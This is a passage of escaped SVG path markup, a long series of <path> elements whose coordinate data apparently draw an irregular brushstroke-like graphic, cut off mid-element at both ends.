d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path 